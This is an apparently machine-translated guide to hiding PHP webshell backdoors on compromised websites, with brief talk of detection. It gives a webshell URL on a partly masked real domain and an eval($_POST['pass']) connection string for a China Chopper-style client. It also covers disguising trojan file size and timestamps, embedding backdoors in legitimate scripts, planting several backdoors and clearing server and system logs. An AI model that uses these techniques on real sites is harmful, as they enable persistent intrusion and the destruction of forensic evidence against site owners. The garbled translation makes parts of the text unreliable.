Webshell hiding and detection ideas

Read the backdoor tips with me: Pick, modify, hide, and hide the example first. Example 1:

You are recognized only when you have a glance in the directory. Why are you so outstanding?

 

 

Suspicious: file name, time, and size. (Experienced people can quickly find these uploaded trojan files)

1. Backdoor Selection

Secure and reliable (no hidden backdoors and stable functions. Attackers can obtain reliable trojans from highly reliable locations)

Conventional horse links for multi-weapon match (pony, Trojan, and metamorphosis horse:

http://www.xxxxxx.org.hk/china60/axdx.php

Here is an example of connecting a metamorphosis horse (this is a pony that can be connected with a kitchen knife, if not entered "? _ = Assert & __= eval ($ _ POST ['pass']) "means the connection fails ):

http://www.xxxxxx.org.hk/china60/axdx.php?_=assert&__=eval($_POST['pass'])

2. Backdoor pre-processing (the work that can be done before uploading should be done locally as much as possible, leaving few traces)

Change default password

Rename-integrate the uploaded folder to make it difficult to intuitively see file exceptions

The disguised processing of file size (like a normal script) is an example of a poor disguised file size: to make the file size more harmonious, it is filled with a lot of useless characters. In fact, you can consider copying the contents of other normal scripts in the folder.

3. selection of backdoor implantation methods (upload, new, and embedded): Upload is the most intuitive method. Some sites do not allow upload. You can create a file by creating a new file, copy and save the contents of the Trojan. The most concealed thing is to embed Trojans into the normal scripts of the website. Modify the file time. + hidden: Multiple backdoors are hidden. The hidden path is a bit deeper. do not access the access path. leave fewer records. After you know the access path, do not access the test again, prevents the log from leaving traces. Another example: (I can't tell if it's a horse)

4. Clear the eye-catching horse (which may be uploaded by someone else). Clear logs-server logs + system logs summary:

 

TIPS: Pick, modify, hide, hide

(Carefully selected, face-changing, rabbit 3 caves + hidden, hidden in the city) knowing how to hide the backdoor means knowing how to discover other people's backdoors. It is best to write an automated script for detection, this is not much to be said.